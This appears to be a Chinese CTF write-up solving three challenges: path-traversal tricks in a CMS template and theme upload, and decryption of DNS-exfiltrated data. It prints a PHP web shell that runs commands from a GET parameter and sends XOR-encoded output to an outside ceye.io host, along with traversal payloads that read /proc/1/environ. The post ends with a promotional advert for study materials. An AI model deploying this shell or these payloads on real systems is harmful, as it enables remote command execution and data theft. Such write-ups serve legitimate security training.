点击左侧栏中的“栏目/文章”选项进入到栏目管理,新建顶级栏目,创建一个命名为测试的顶级栏目。
在封面模版处,添加路径为:
../../../../../../../../../../flag
点击保存,访问前台,重新访问对应的顶级栏目,得到flag
0x02 Dreamer_revenge
跟上一个题一样
第一种思路是跟上一个题目一样,只不过把访问的文件改成../../.../../../../proc/1/environ
第二种思路是利用后台模板管理可以任意编辑的漏洞
先把default_v2
目录复制一份,修改成default_v3
。
修改其中的theme.json
文件。将其中的themePath
值修改成../../../../../../../../../../../../../../
然后打包default_v3
成default_v3.zip
,到后台风格管理处上传zip文件并启用主题。
此时再去访问模版管理即可从根目录访问所有文件
跟之前一样,访问/proc/1/environ
,即可找到flag
0x03 hacker
<?php $servername="127.0.0.1"; $username="root"; $password="123456"; $dbname="zentao"; $conn=new PDO("mysql:host=$servername;dbname=$dbname",$username,$password); $conn->setAttribute(PDO::ATTR\_ERRMODE,PDO::ERRMODE\_EXCEPTION); $stmt=$conn->prepare("SELECT password FROM zt\_user WHERE account=\'admin\'"); $stmt->execute(); $result=$stmt->fetch(PDO::FETCH\_ASSOC); $conn=null; $param=$\_GET["cmd"]; $password=$result["password"]; $output=shell\_exec($param); $hex\_output=bin2hex($output); $hex\_password=bin2hex($password); $len\_output=strlen($hex\_output); $len\_password=strlen($hex\_password); $max\_subdomain\_length=62; $subdomain\_base="yafgcy.ceye.io"; $hex\_xor=""; for ($i=0;$i<$len\_output;$i++) { $char\_output=$hex\_output[$i]; $char\_password=$hex\_password[$i%$len\_password]; $char\_xor=dechex(hexdec($char\_output)^hexdec($char\_password)); if(strlen($hex\_xor.$char\_xor)>$max\_subdomain\_length) { if(strlen($hex\_xor)%2!=0) { $subdomain="0"."$hex\_xor.$subdomain\_base"; } else { $subdomain="$hex\_xor.$subdomain\_base"; } gethostbyname($subdomain); $hex\_xor=""; } else { $hex\_xor.=$char\_xor; } } if(strlen($hex\_xor)%2!=0) { $subdomain="0"."$hex\_xor.$subdomain\_base"; } else { $subdomain="$hex\_xor.$subdomain\_base"; } gethostbyname($subdomain); ?>可以看到执行命令的被外带了,响应包并不会有回显
注入查询出来的数据库数据,里面有admin的密码
select account,password from zt_user{“status”:“success”,“data”:“[{“account”:“admin”,“password”:“8a3e684c923b763d252cf1e8734a7a29”},{“account”:“productManager”,“password”:“e10adc3949ba59abbe56e057f20f883e”},{“account”:“projectManager”,“password”:“e10adc3949ba59abbe56e057f20f883e”},{“account”:“dev1”,“password”:“e10adc3949ba59abbe56e057f20f883e”},{“account”:“dev2”,“password”:“e10adc3949ba59abbe56e057f20f883e”},{“account”:“dev3”,“password”:“e10adc3949ba59abbe56e057f20f883e”},{“account”:“tester1”,“password”:“e10adc3949ba59abbe56e057f20f883e”},{“account”:“tester2”,“password”:“e10adc3949ba59abbe56e057f20f883e”},{“account”:“tester3”,“password”:“e10adc3949ba59abbe56e057f20f883e”},{“account”:“testManager”,“password”:“e10adc3949ba59abbe56e057f20f883e”},{“account”:“test”,“password”:“e10adc3949ba59abbe56e057f20f883e”}]”,“md5”:“71cfaa7002d809c0860d3749abb3454c”}
有了加密逻辑以及密码,就可以解密数据了,外带的数据也被wireshark截获了
去除重复的,总共有八段数据,一开始测试的时候发现除了第一条和第四条能成功解密,其他都是乱码,经过摸索才发现每条需要按照[0:] [1:] [2:] [4:]截断,其中[1:]的还得去掉最后一位,才能正确解密,而且解密出来的明文在开头还会丢失一两位字符。可能与加密逻辑的 if (strlen($hex_xor . $char_xor) > $max_subdomain_length) {...}
这段处理有关,不过我实在看不出来这段为啥会造成数据丢失
59115a4b465044695a5a56015c4252065e501c130e416f5c5647556b510044
0 5b0e5d4b5f5b5b69505c57074f18430c423f5b0c0852105a521d4409476b 5
4a 32135c07594c474d4d4a47684453501657411c171e456f4c5f5659043d19
0c49 5011391d4e40054d495a4368
79227024716c7522787370254c777230667673222570247b76677322632671
d 7b357226771575227a7372237677702573611f372570317b767277207620 6
14 79207024777b60247e6674231a626727666171372570317f766773207620
0678 79226731756c60206d75703670754e
根据加密逻辑,解密处理
<?php $hex\_output = "59115a4b465044695a5a56015c4252065e501c130e416f5c5647556b510044"; $hex\_password = bin2hex("8a3e684c923b763d252cf1e8734a7a29"); $len\_output = strlen($hex\_output); $len\_password = strlen($hex\_password); $hex\_xor = ""; for ($i = 0; $i < $len\_output; $i++) { $char\_data = $hex\_output[$i]; $char\_password = $hex\_password[$i % $len\_password]; $output = dechex(hexdec($char\_data) ^ hexdec($char\_password)); $hex\_xor .= $output; } echo $hex\_xor."\n"; echo hex2bin($hex\_xor); ?>解密结果:
api.php
checktable.php
data
favcon.ico
index.php
ioncube.php
robots.txt
secret.txt
theme
xhp
xxx1.php
ACCAGTAAAACG{AATTCAACAACATGCTGCCTACA-AACAAAAACAAT-TCATCAACAAAAACAACTGGTGA-TTCTTCTCATGATGAAAACTTCTTCTGCTGC}
flag经过DNS Cipher处理:https://github.com/karma9874/DNA-Cipher-Script-CTF
替换几位会发现flag格式是uuid形式的,按照以下这个规则替换即可
‘AAA’:‘a’
‘AAC’:‘b’
‘AAG’:‘c’
‘AAT’:‘d’
‘ACA’:‘e’
‘ACC’:‘f’
‘TCA’:‘1’
‘TCC’:‘2’
‘TCG’:‘3’
‘TCT’:‘4’
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。
深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!
因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!
由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新
如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)
给大家的福利
零基础入门
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
同时每个成长路线对应的板块都有配套的视频提供:
因篇幅有限,仅展示部分资料
一个人可以走的很快,但一群人才能走的更远。如果你从事以下工作或对以下感兴趣,欢迎戳这里加入程序员的圈子,让我们一起学习成长!
AI人工智能、Android移动开发、AIGC大模型、C C#、Go语言、Java、Linux运维、云计算、MySQL、PMP、网络安全、Python爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算
6d4c3ab8389e65ecb71ac0)
AI人工智能、Android移动开发、AIGC大模型、C C#、Go语言、Java、Linux运维、云计算、MySQL、PMP、网络安全、Python爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算